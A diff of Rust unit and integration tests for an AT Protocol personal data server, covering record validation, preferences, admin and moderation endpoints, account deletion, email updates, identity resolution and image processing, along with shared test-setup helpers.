    if collection.is_empty() {
        return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
···
    }
    Ok(())
}
+
#[cfg(test)]
mod tests {
    use super::*;
    use serde_json::json;
+
    #[test]
    fn test_validate_post() {
        let validator = RecordValidator::new();
···
            ValidationStatus::Valid
        );
    }
+
    #[test]
    fn test_validate_post_missing_text() {
        let validator = RecordValidator::new();
···
        });
        assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
    }
+
    #[test]
    fn test_validate_type_mismatch() {
        let validator = RecordValidator::new();
···
        let result = validator.validate(&record, "app.bsky.feed.post");
        assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
    }
+
    #[test]
    fn test_validate_unknown_type() {
        let validator = RecordValidator::new();
···
            ValidationStatus::Unknown
        );
    }
+
    #[test]
    fn test_validate_unknown_type_strict() {
        let validator = RecordValidator::new().require_lexicon(true);
···
        let result = validator.validate(&record, "com.example.custom");
        assert!(matches!(result, Err(ValidationError::UnknownType(_))));
    }
+
    #[test]
    fn test_validate_record_key() {
        assert!(validate_record_key("valid-key_123").is_ok());
···
        assert!(validate_record_key("").is_err());
        assert!(validate_record_key("invalid/key").is_err());
    }
+
    #[test]
    fn test_validate_collection_nsid() {
        assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
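A usage sketch (not in the diff) tying the public pieces above together; the record body is illustrative, and the two-argument validate call mirrors the tests shown.

fn validation_sketch() -> Result<(), ValidationError> {
    // Collection and record-key checks are free functions.
    validate_collection_nsid("app.bsky.feed.post")?;
    validate_record_key("valid-key_123")?;

    // The validator is lenient by default; require_lexicon(true) rejects unknown types instead.
    let record = serde_json::json!({
        "$type": "app.bsky.feed.post",
        "text": "hello world",
        "createdAt": "2024-01-01T00:00:00.000Z"
    });
    let status = RecordValidator::new().validate(&record, "app.bsky.feed.post")?;
    assert_eq!(status, ValidationStatus::Valid);
    Ok(())
}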
+11 tests/actor.rs
···
mod common;
use common::{base_url, client, create_account_and_login};
use serde_json::{json, Value};
+
#[tokio::test]
async fn test_get_preferences_empty() {
    let client = client();
···
    assert!(body.get("preferences").is_some());
    assert!(body["preferences"].as_array().unwrap().is_empty());
}
+
#[tokio::test]
async fn test_get_preferences_no_auth() {
    let client = client();
···
        .unwrap();
    assert_eq!(resp.status(), 401);
}
+
#[tokio::test]
async fn test_put_preferences_success() {
    let client = client();
···
    assert!(adult_pref.is_some());
    assert_eq!(adult_pref.unwrap()["enabled"], true);
}
+
#[tokio::test]
async fn test_put_preferences_no_auth() {
    let client = client();
···
        .unwrap();
    assert_eq!(resp.status(), 401);
}
+
#[tokio::test]
async fn test_put_preferences_missing_type() {
    let client = client();
···
    let body: Value = resp.json().await.unwrap();
    assert_eq!(body["error"], "InvalidRequest");
}
+
#[tokio::test]
async fn test_put_preferences_invalid_namespace() {
    let client = client();
···
    let body: Value = resp.json().await.unwrap();
    assert_eq!(body["error"], "InvalidRequest");
}
+
#[tokio::test]
async fn test_put_preferences_read_only_rejected() {
    let client = client();
···
    let body: Value = resp.json().await.unwrap();
    assert_eq!(body["error"], "InvalidRequest");
}
+
#[tokio::test]
async fn test_put_preferences_replaces_all() {
    let client = client();
···
    assert_eq!(prefs_arr.len(), 1);
    assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#threadViewPref");
}
+
#[tokio::test]
async fn test_put_preferences_saved_feeds() {
    let client = client();
···
    assert_eq!(saved_feeds["$type"], "app.bsky.actor.defs#savedFeedsPrefV2");
    assert!(saved_feeds["items"].as_array().unwrap().len() == 1);
}
+
#[tokio::test]
async fn test_put_preferences_muted_words() {
    let client = client();
···
    let prefs_arr = body["preferences"].as_array().unwrap();
    assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#mutedWordsPref");
}
+
#[tokio::test]
async fn test_preferences_isolation_between_users() {
    let client = client();
+8 tests/admin_email.rs
···
mod common;
+
use reqwest::StatusCode;
use serde_json::{json, Value};
use sqlx::PgPool;
+
async fn get_pool() -> PgPool {
    let conn_str = common::get_db_connection_string().await;
    sqlx::postgres::PgPoolOptions::new()
···
        .await
        .expect("Failed to connect to test database")
}
+
#[tokio::test]
async fn test_send_email_success() {
    let client = common::client();
···
    assert_eq!(notification.subject.as_deref(), Some("Test Admin Email"));
    assert!(notification.body.contains("Hello, this is a test email from the admin."));
}
+
#[tokio::test]
async fn test_send_email_default_subject() {
    let client = common::client();
···
    assert!(notification.subject.is_some());
    assert!(notification.subject.unwrap().contains("Message from"));
}
+
#[tokio::test]
async fn test_send_email_recipient_not_found() {
    let client = common::client();
···
    let body: Value = res.json().await.expect("Invalid JSON");
    assert_eq!(body["error"], "AccountNotFound");
}
+
#[tokio::test]
async fn test_send_email_missing_content() {
    let client = common::client();
···
    let body: Value = res.json().await.expect("Invalid JSON");
    assert_eq!(body["error"], "InvalidRequest");
}
+
#[tokio::test]
async fn test_send_email_missing_recipient() {
    let client = common::client();
···
    let body: Value = res.json().await.expect("Invalid JSON");
    assert_eq!(body["error"], "InvalidRequest");
}
+
#[tokio::test]
async fn test_send_email_requires_auth() {
    let client = common::client();
+12 tests/admin_invite.rs
···
mod common;
+
use common::*;
use reqwest::StatusCode;
use serde_json::{Value, json};
+
#[tokio::test]
async fn test_admin_get_invite_codes_success() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert!(body["codes"].is_array());
}
+
#[tokio::test]
async fn test_admin_get_invite_codes_with_limit() {
    let client = client();
···
    let codes = body["codes"].as_array().unwrap();
    assert!(codes.len() <= 2);
}
+
#[tokio::test]
async fn test_admin_get_invite_codes_no_auth() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
+
#[tokio::test]
async fn test_disable_account_invites_success() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "InvitesDisabled");
}
+
#[tokio::test]
async fn test_enable_account_invites_success() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
}
+
#[tokio::test]
async fn test_disable_account_invites_no_auth() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
+
#[tokio::test]
async fn test_disable_account_invites_not_found() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::NOT_FOUND);
}
+
#[tokio::test]
async fn test_disable_invite_codes_by_code() {
    let client = client();
···
    assert!(disabled_code.is_some());
    assert_eq!(disabled_code.unwrap()["disabled"], true);
}
+
#[tokio::test]
async fn test_disable_invite_codes_by_account() {
    let client = client();
···
        assert_eq!(code["disabled"], true);
    }
}
+
#[tokio::test]
async fn test_disable_invite_codes_no_auth() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
+
#[tokio::test]
async fn test_admin_enable_account_invites_not_found() {
    let client = client();
+10 tests/admin_moderation.rs
···
mod common;
+
use common::*;
use reqwest::StatusCode;
use serde_json::{Value, json};
+
#[tokio::test]
async fn test_get_subject_status_user_success() {
    let client = client();
···
    assert_eq!(body["subject"]["$type"], "com.atproto.admin.defs#repoRef");
    assert_eq!(body["subject"]["did"], did);
}
+
#[tokio::test]
async fn test_get_subject_status_not_found() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "SubjectNotFound");
}
+
#[tokio::test]
async fn test_get_subject_status_no_param() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "InvalidRequest");
}
+
#[tokio::test]
async fn test_get_subject_status_no_auth() {
    let client = client();
···
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
+
#[tokio::test]
async fn test_update_subject_status_takedown_user() {
    let client = client();
···
    assert_eq!(status_body["takedown"]["applied"], true);
    assert_eq!(status_body["takedown"]["ref"], "mod-action-123");
}
+
#[tokio::test]
async fn test_update_subject_status_remove_takedown() {
    let client = client();
···
    let status_body: Value = status_res.json().await.unwrap();
    assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false));
}
+
#[tokio::test]
async fn test_update_subject_status_deactivate_user() {
    let client = client();
···
    assert!(status_body["deactivated"].is_object());
    assert_eq!(status_body["deactivated"]["applied"], true);
}
+
#[tokio::test]
async fn test_update_subject_status_invalid_type() {
    let client = client();
···
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "InvalidRequest");
}
+
#[tokio::test]
async fn test_update_subject_status_no_auth() {
    let client = client();
+6 tests/appview_integration.rs
···
mod common;
+
use common::{base_url, client, create_account_and_login};
use reqwest::StatusCode;
use serde_json::{json, Value};
+
#[tokio::test]
async fn test_get_author_feed_returns_appview_data() {
    let client = client();
···
        "Post text should match appview response"
    );
}
+
#[tokio::test]
async fn test_get_actor_likes_returns_appview_data() {
    let client = client();
···
        "Post text should match appview response"
    );
}
+
#[tokio::test]
async fn test_get_post_thread_returns_appview_data() {
    let client = client();
···
        "Post text should match appview response"
    );
}
+
#[tokio::test]
async fn test_get_feed_returns_appview_data() {
    let client = client();
···
        "Post text should match appview response"
    );
}
+
#[tokio::test]
async fn test_register_push_proxies_to_appview() {
    let client = client();
+17
tests/common/mod.rs
···
14
use tokio::net::TcpListener;
15
use wiremock::matchers::{method, path};
16
use wiremock::{Mock, MockServer, ResponseTemplate};
17
+
18
static SERVER_URL: OnceLock<String> = OnceLock::new();
19
static APP_PORT: OnceLock<u16> = OnceLock::new();
20
static MOCK_APPVIEW: OnceLock<MockServer> = OnceLock::new();
21
+
22
#[cfg(not(feature = "external-infra"))]
23
use testcontainers::core::ContainerPort;
24
#[cfg(not(feature = "external-infra"))]
···
29
static DB_CONTAINER: OnceLock<ContainerAsync<Postgres>> = OnceLock::new();
30
#[cfg(not(feature = "external-infra"))]
31
static S3_CONTAINER: OnceLock<ContainerAsync<GenericImage>> = OnceLock::new();
32
+
33
#[allow(dead_code)]
34
pub const AUTH_TOKEN: &str = "test-token";
35
#[allow(dead_code)]
···
38
pub const AUTH_DID: &str = "did:plc:fake";
39
#[allow(dead_code)]
40
pub const TARGET_DID: &str = "did:plc:target";
41
+
42
fn has_external_infra() -> bool {
43
std::env::var("BSPDS_TEST_INFRA_READY").is_ok()
44
|| (std::env::var("DATABASE_URL").is_ok() && std::env::var("S3_ENDPOINT").is_ok())
···
58
.args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"])
59
.output();
60
}
61
+
62
#[allow(dead_code)]
63
pub fn client() -> Client {
64
Client::new()
65
}
66
+
67
#[allow(dead_code)]
68
pub fn app_port() -> u16 {
69
*APP_PORT.get().expect("APP_PORT not initialized")
70
}
71
+
72
pub async fn base_url() -> &'static str {
73
SERVER_URL.get_or_init(|| {
74
let (tx, rx) = std::sync::mpsc::channel();
···
101
rx.recv().expect("Failed to start test server")
102
})
103
}
104
+
105
async fn setup_with_external_infra() -> String {
106
let database_url = std::env::var("DATABASE_URL")
107
.expect("DATABASE_URL must be set when using external infra");
···
122
MOCK_APPVIEW.set(mock_server).ok();
123
spawn_app(database_url).await
124
}
125
+
126
#[cfg(not(feature = "external-infra"))]
127
async fn setup_with_testcontainers() -> String {
128
let s3_container = GenericImage::new("minio/minio", "latest")
···
186
DB_CONTAINER.set(container).ok();
187
spawn_app(connection_string).await
188
}
189
+
190
#[cfg(feature = "external-infra")]
191
async fn setup_with_testcontainers() -> String {
192
panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT.");
193
}
194
+
195
async fn setup_mock_appview(mock_server: &MockServer) {
196
Mock::given(method("GET"))
197
.and(path("/xrpc/app.bsky.actor.getProfile"))
···
321
.mount(mock_server)
322
.await;
323
}
324
+
325
async fn spawn_app(database_url: String) -> String {
326
use bspds::rate_limit::RateLimiters;
327
let pool = PgPoolOptions::new()
···
354
});
355
format!("http://{}", addr)
356
}
357
+
358
#[allow(dead_code)]
359
pub async fn get_db_connection_string() -> String {
360
base_url().await;
···
373
}
374
}
375
}
376
+
377
#[allow(dead_code)]
378
pub async fn verify_new_account(client: &Client, did: &str) -> String {
379
let conn_str = get_db_connection_string().await;
···
410
.expect("No accessJwt in confirmSignup response")
411
.to_string()
412
}
413
+
414
#[allow(dead_code)]
415
pub async fn upload_test_blob(client: &Client, data: &'static str, mime: &'static str) -> Value {
416
let res = client
···
428
let body: Value = res.json().await.expect("Blob upload response was not JSON");
429
body["blob"].clone()
430
}
431
+
432
#[allow(dead_code)]
433
pub async fn create_test_post(
434
client: &Client,
···
479
.to_string();
480
(uri, cid, rkey)
481
}
482
+
483
#[allow(dead_code)]
484
pub async fn create_account_and_login(client: &Client) -> (String, String) {
485
let mut last_error = String::new();
+10
tests/delete_account.rs
···
5
use reqwest::StatusCode;
6
use serde_json::{Value, json};
7
use sqlx::PgPool;
8
+
9
async fn get_pool() -> PgPool {
10
let conn_str = get_db_connection_string().await;
11
sqlx::postgres::PgPoolOptions::new()
···
14
.await
15
.expect("Failed to connect to test database")
16
}
17
+
18
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) {
19
let res = client
20
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
32
let jwt = verify_new_account(client, &did).await;
33
(did, jwt)
34
}
35
+
36
#[tokio::test]
37
async fn test_delete_account_full_flow() {
38
let client = client();
···
89
.expect("Failed to check session");
90
assert_eq!(session_res.status(), StatusCode::UNAUTHORIZED);
91
}
92
+
93
#[tokio::test]
94
async fn test_delete_account_wrong_password() {
95
let client = client();
···
133
let body: Value = delete_res.json().await.unwrap();
134
assert_eq!(body["error"], "AuthenticationFailed");
135
}
136
+
137
#[tokio::test]
138
async fn test_delete_account_invalid_token() {
139
let client = client();
···
176
let body: Value = delete_res.json().await.unwrap();
177
assert_eq!(body["error"], "InvalidToken");
178
}
179
+
180
#[tokio::test]
181
async fn test_delete_account_expired_token() {
182
let client = client();
···
227
let body: Value = delete_res.json().await.unwrap();
228
assert_eq!(body["error"], "ExpiredToken");
229
}
230
+
231
#[tokio::test]
232
async fn test_delete_account_token_mismatch() {
233
let client = client();
···
275
let body: Value = delete_res.json().await.unwrap();
276
assert_eq!(body["error"], "InvalidToken");
277
}
278
+
279
#[tokio::test]
280
async fn test_delete_account_with_app_password() {
281
let client = client();
···
335
.expect("Failed to query user");
336
assert!(user_row.is_none(), "User should be deleted from database");
337
}
338
+
339
#[tokio::test]
340
async fn test_delete_account_missing_fields() {
341
let client = client();
···
380
.expect("Failed to send request");
381
assert_eq!(res3.status(), StatusCode::UNPROCESSABLE_ENTITY);
382
}
383
+
384
#[tokio::test]
385
async fn test_delete_account_nonexistent_user() {
386
let client = client();
+14
tests/email_update.rs
···
2
use reqwest::StatusCode;
3
use serde_json::{json, Value};
4
use sqlx::PgPool;
5
+
6
async fn get_pool() -> PgPool {
7
let conn_str = common::get_db_connection_string().await;
8
sqlx::postgres::PgPoolOptions::new()
···
11
.await
12
.expect("Failed to connect to test database")
13
}
14
+
15
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String {
16
let res = client
17
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
28
let did = body["did"].as_str().expect("No did");
29
common::verify_new_account(client, did).await
30
}
31
+
32
#[tokio::test]
33
async fn test_email_update_flow_success() {
34
let client = common::client();
···
80
assert!(user.email_pending_verification.is_none());
81
assert!(user.email_confirmation_code.is_none());
82
}
83
+
84
#[tokio::test]
85
async fn test_request_email_update_taken_email() {
86
let client = common::client();
···
102
let body: Value = res.json().await.expect("Invalid JSON");
103
assert_eq!(body["error"], "EmailTaken");
104
}
105
+
106
#[tokio::test]
107
async fn test_confirm_email_invalid_token() {
108
let client = common::client();
···
133
let body: Value = res.json().await.expect("Invalid JSON");
134
assert_eq!(body["error"], "InvalidToken");
135
}
136
+
137
#[tokio::test]
138
async fn test_confirm_email_wrong_email() {
139
let client = common::client();
···
170
let body: Value = res.json().await.expect("Invalid JSON");
171
assert_eq!(body["message"], "Email does not match pending update");
172
}
173
+
174
#[tokio::test]
175
async fn test_update_email_success_no_token_required() {
176
let client = common::client();
···
194
.expect("User not found");
195
assert_eq!(user.email, Some(new_email));
196
}
197
+
198
#[tokio::test]
199
async fn test_update_email_same_email_noop() {
200
let client = common::client();
···
211
.expect("Failed to update email");
212
assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op");
213
}
214
+
215
#[tokio::test]
216
async fn test_update_email_requires_token_after_pending() {
217
let client = common::client();
···
239
let body: Value = res.json().await.expect("Invalid JSON");
240
assert_eq!(body["error"], "TokenRequired");
241
}
242
+
243
#[tokio::test]
244
async fn test_update_email_with_valid_token() {
245
let client = common::client();
···
283
assert_eq!(user.email, Some(new_email));
284
assert!(user.email_pending_verification.is_none());
285
}
286
+
287
#[tokio::test]
288
async fn test_update_email_invalid_token() {
289
let client = common::client();
···
314
let body: Value = res.json().await.expect("Invalid JSON");
315
assert_eq!(body["error"], "InvalidToken");
316
}
317
+
318
#[tokio::test]
319
async fn test_update_email_already_taken() {
320
let client = common::client();
···
336
let body: Value = res.json().await.expect("Invalid JSON");
337
assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest");
338
}
339
+
340
#[tokio::test]
341
async fn test_update_email_no_auth() {
342
let client = common::client();
···
351
let body: Value = res.json().await.expect("Invalid JSON");
352
assert_eq!(body["error"], "AuthenticationRequired");
353
}
354
+
355
#[tokio::test]
356
async fn test_update_email_invalid_format() {
357
let client = common::client();
+7
tests/feed.rs
···
1
mod common;
2
use common::{base_url, client, create_account_and_login};
3
use serde_json::json;
4
+
5
#[tokio::test]
6
async fn test_get_timeline_requires_auth() {
7
let client = client();
···
13
.unwrap();
14
assert_eq!(res.status(), 401);
15
}
16
+
17
#[tokio::test]
18
async fn test_get_author_feed_requires_actor() {
19
let client = client();
···
27
.unwrap();
28
assert_eq!(res.status(), 400);
29
}
30
+
31
#[tokio::test]
32
async fn test_get_actor_likes_requires_actor() {
33
let client = client();
···
41
.unwrap();
42
assert_eq!(res.status(), 400);
43
}
44
+
45
#[tokio::test]
46
async fn test_get_post_thread_requires_uri() {
47
let client = client();
···
55
.unwrap();
56
assert_eq!(res.status(), 400);
57
}
58
+
59
#[tokio::test]
60
async fn test_get_feed_requires_auth() {
61
let client = client();
···
70
.unwrap();
71
assert_eq!(res.status(), 401);
72
}
73
+
74
#[tokio::test]
75
async fn test_get_feed_requires_feed_param() {
76
let client = client();
···
84
.unwrap();
85
assert_eq!(res.status(), 400);
86
}
87
+
88
#[tokio::test]
89
async fn test_register_push_requires_auth() {
90
let client = client();
+6
tests/firehose.rs
···
8
use serde_json::{json, Value};
9
use std::io::Cursor;
10
use tokio_tungstenite::{connect_async, tungstenite};
11
+
12
#[derive(Debug, Deserialize)]
13
struct FrameHeader {
14
op: i64,
15
t: String,
16
}
17
+
18
#[derive(Debug, Deserialize)]
19
struct CommitFrame {
20
seq: i64,
···
31
blobs: Vec<Cid>,
32
time: String,
33
}
34
+
35
#[derive(Debug, Deserialize)]
36
struct RepoOp {
37
action: String,
38
path: String,
39
cid: Option<Cid>,
40
}
41
+
42
fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> {
43
let mut pos = 0;
44
fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> {
···
108
skip_value(bytes, &mut pos)?;
109
Ok(pos)
110
}
111
+
112
fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> {
113
let header_len = find_cbor_map_end(bytes)?;
114
let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len])
···
118
.map_err(|e| format!("Failed to parse commit frame: {:?}", e))?;
119
Ok((header, frame))
120
}
121
+
122
#[tokio::test]
123
async fn test_firehose_subscription() {
124
let client = client();
+1
-1
tests/firehose_validation.rs
+6
tests/helpers/mod.rs
···
1
use chrono::Utc;
2
use reqwest::StatusCode;
3
use serde_json::{Value, json};
4
+
5
pub use crate::common::*;
6
+
7
#[allow(dead_code)]
8
pub async fn setup_new_user(handle_prefix: &str) -> (String, String) {
9
let client = client();
···
42
let new_jwt = verify_new_account(&client, &new_did).await;
43
(new_did, new_jwt)
44
}
45
+
46
#[allow(dead_code)]
47
pub async fn create_post(
48
client: &reqwest::Client,
···
86
let cid = create_body["cid"].as_str().unwrap().to_string();
87
(uri, cid)
88
}
89
+
90
#[allow(dead_code)]
91
pub async fn create_follow(
92
client: &reqwest::Client,
···
130
let cid = create_body["cid"].as_str().unwrap().to_string();
131
(uri, cid)
132
}
133
+
134
#[allow(dead_code)]
135
pub async fn create_like(
136
client: &reqwest::Client,
···
172
body["cid"].as_str().unwrap().to_string(),
173
)
174
}
175
+
176
#[allow(dead_code)]
177
pub async fn create_repost(
178
client: &reqwest::Client,
+9
tests/identity.rs
4
use serde_json::{Value, json};
5
use wiremock::matchers::{method, path};
6
use wiremock::{Mock, MockServer, ResponseTemplate};
7
+
8
#[tokio::test]
9
async fn test_resolve_handle_success() {
10
let client = client();
···
40
let body: Value = res.json().await.expect("Response was not valid JSON");
41
assert_eq!(body["did"], did);
42
}
43
+
44
#[tokio::test]
45
async fn test_resolve_handle_not_found() {
46
let client = client();
···
58
let body: Value = res.json().await.expect("Response was not valid JSON");
59
assert_eq!(body["error"], "HandleNotFound");
60
}
61
+
62
#[tokio::test]
63
async fn test_resolve_handle_missing_param() {
64
let client = client();
···
72
.expect("Failed to send request");
73
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
74
}
75
+
76
#[tokio::test]
77
async fn test_well_known_did() {
78
let client = client();
···
86
assert!(body["id"].as_str().unwrap().starts_with("did:web:"));
87
assert_eq!(body["service"][0]["type"], "AtprotoPersonalDataServer");
88
}
89
+
90
#[tokio::test]
91
async fn test_create_did_web_account_and_resolve() {
92
let client = client();
···
150
assert_eq!(doc["verificationMethod"][0]["controller"], did);
151
assert!(doc["verificationMethod"][0]["publicKeyJwk"].is_object());
152
}
153
+
154
#[tokio::test]
155
async fn test_create_account_duplicate_handle() {
156
let client = client();
···
184
let body: Value = res.json().await.expect("Response was not JSON");
185
assert_eq!(body["error"], "HandleTaken");
186
}
187
+
188
#[tokio::test]
189
async fn test_did_web_lifecycle() {
190
let client = client();
···
274
assert_eq!(record_body["value"]["displayName"], "DID Web User");
275
*/
276
}
277
+
278
#[tokio::test]
279
async fn test_get_recommended_did_credentials_success() {
280
let client = client();
···
304
assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer");
305
assert!(body["services"]["atprotoPds"]["endpoint"].is_string());
306
}
307
+
308
#[tokio::test]
309
async fn test_get_recommended_did_credentials_no_auth() {
310
let client = client();
+31
tests/image_processing.rs
···
1
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
2
use image::{DynamicImage, ImageFormat};
3
use std::io::Cursor;
4
+
5
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
6
let img = DynamicImage::new_rgb8(width, height);
7
let mut buf = Vec::new();
8
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
9
buf
10
}
11
+
12
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
13
let img = DynamicImage::new_rgb8(width, height);
14
let mut buf = Vec::new();
15
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
16
buf
17
}
18
+
19
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
20
let img = DynamicImage::new_rgb8(width, height);
21
let mut buf = Vec::new();
22
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
23
buf
24
}
25
+
26
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
27
let img = DynamicImage::new_rgb8(width, height);
28
let mut buf = Vec::new();
29
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
30
buf
31
}
32
+
33
#[test]
34
fn test_process_png() {
35
let processor = ImageProcessor::new();
···
38
assert_eq!(result.original.width, 500);
39
assert_eq!(result.original.height, 500);
40
}
41
+
42
#[test]
43
fn test_process_jpeg() {
44
let processor = ImageProcessor::new();
···
47
assert_eq!(result.original.width, 400);
48
assert_eq!(result.original.height, 300);
49
}
50
+
51
#[test]
52
fn test_process_gif() {
53
let processor = ImageProcessor::new();
···
56
assert_eq!(result.original.width, 200);
57
assert_eq!(result.original.height, 200);
58
}
59
+
60
#[test]
61
fn test_process_webp() {
62
let processor = ImageProcessor::new();
···
65
assert_eq!(result.original.width, 300);
66
assert_eq!(result.original.height, 200);
67
}
68
+
69
#[test]
70
fn test_thumbnail_feed_size() {
71
let processor = ImageProcessor::new();
···
75
assert!(thumb.width <= THUMB_SIZE_FEED);
76
assert!(thumb.height <= THUMB_SIZE_FEED);
77
}
78
+
79
#[test]
80
fn test_thumbnail_full_size() {
81
let processor = ImageProcessor::new();
···
85
assert!(thumb.width <= THUMB_SIZE_FULL);
86
assert!(thumb.height <= THUMB_SIZE_FULL);
87
}
88
+
89
#[test]
90
fn test_no_thumbnail_small_image() {
91
let processor = ImageProcessor::new();
···
94
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
95
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
96
}
97
+
98
#[test]
99
fn test_webp_conversion() {
100
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
102
let result = processor.process(&data, "image/png").unwrap();
103
assert_eq!(result.original.mime_type, "image/webp");
104
}
105
+
106
#[test]
107
fn test_jpeg_output_format() {
108
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
···
110
let result = processor.process(&data, "image/png").unwrap();
111
assert_eq!(result.original.mime_type, "image/jpeg");
112
}
113
+
114
#[test]
115
fn test_png_output_format() {
116
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
···
118
let result = processor.process(&data, "image/jpeg").unwrap();
119
assert_eq!(result.original.mime_type, "image/png");
120
}
121
+
122
#[test]
123
fn test_max_dimension_enforced() {
124
let processor = ImageProcessor::new().with_max_dimension(1000);
···
131
assert_eq!(max_dimension, 1000);
132
}
133
}
134
+
135
#[test]
136
fn test_file_size_limit() {
137
let processor = ImageProcessor::new().with_max_file_size(100);
···
143
assert_eq!(max_size, 100);
144
}
145
}
146
+
147
#[test]
148
fn test_default_max_file_size() {
149
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
150
}
151
+
152
#[test]
153
fn test_unsupported_format_rejected() {
154
let processor = ImageProcessor::new();
···
156
let result = processor.process(data, "application/octet-stream");
157
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
158
}
159
+
160
#[test]
161
fn test_corrupted_image_handling() {
162
let processor = ImageProcessor::new();
···
164
let result = processor.process(data, "image/png");
165
assert!(matches!(result, Err(ImageError::DecodeError(_))));
166
}
167
+
168
#[test]
169
fn test_aspect_ratio_preserved_landscape() {
170
let processor = ImageProcessor::new();
···
175
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
176
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
177
}
178
+
179
#[test]
180
fn test_aspect_ratio_preserved_portrait() {
181
let processor = ImageProcessor::new();
···
186
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
187
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
188
}
189
+
190
#[test]
191
fn test_mime_type_detection_auto() {
192
let processor = ImageProcessor::new();
···
194
let result = processor.process(&data, "application/octet-stream");
195
assert!(result.is_ok(), "Should detect PNG format from data");
196
}
197
+
198
#[test]
199
fn test_is_supported_mime_type() {
200
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
···
209
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
210
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
211
}
212
+
213
#[test]
214
fn test_strip_exif() {
215
let data = create_test_jpeg(100, 100);
···
218
let stripped = result.unwrap();
219
assert!(!stripped.is_empty());
220
}
221
+
222
#[test]
223
fn test_with_thumbnails_disabled() {
224
let processor = ImageProcessor::new().with_thumbnails(false);
···
227
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
228
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
229
}
230
+
231
#[test]
232
fn test_builder_chaining() {
233
let processor = ImageProcessor::new()
···
239
let result = processor.process(&data, "image/png").unwrap();
240
assert_eq!(result.original.mime_type, "image/jpeg");
241
}
242
+
243
#[test]
244
fn test_processed_image_fields() {
245
let processor = ImageProcessor::new();
···
250
assert!(result.original.width > 0);
251
assert!(result.original.height > 0);
252
}
253
+
254
#[test]
255
fn test_only_feed_thumbnail_for_medium_images() {
256
let processor = ImageProcessor::new();
···
259
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
260
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
261
}
262
+
263
#[test]
264
fn test_both_thumbnails_for_large_images() {
265
let processor = ImageProcessor::new();
···
268
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
269
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
270
}
271
+
272
#[test]
273
fn test_exact_threshold_boundary_feed() {
274
let processor = ImageProcessor::new();
···
279
let result = processor.process(&above_threshold, "image/png").unwrap();
280
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
281
}
282
+
283
#[test]
284
fn test_exact_threshold_boundary_full() {
285
let processor = ImageProcessor::new();
+11
tests/import_verification.rs
···
3
use iroh_car::CarHeader;
4
